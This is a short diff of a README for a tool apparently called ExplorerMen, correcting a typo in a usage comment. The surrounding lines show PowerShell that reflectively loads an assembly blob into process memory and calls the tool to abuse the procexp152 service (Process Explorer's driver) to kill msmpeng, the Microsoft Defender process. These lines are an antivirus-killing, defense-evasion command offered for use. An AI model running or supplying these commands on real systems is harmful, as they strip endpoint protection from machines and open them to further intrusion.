Yair-Men/ExplorerMen/README.md

 # Use reflection to load it into current process memory space
 [System.Reflection.Assembly]::Load($blob)

-# Launch the app, seratch for the service name procexp152 and kill process named msmpeng
+# Launch the app, search for the service name procexp152 and kill process named msmpeng
 [ExplorerMen.Program]::Main("/service:procexp152 /name:msmpeng".Split())
 ```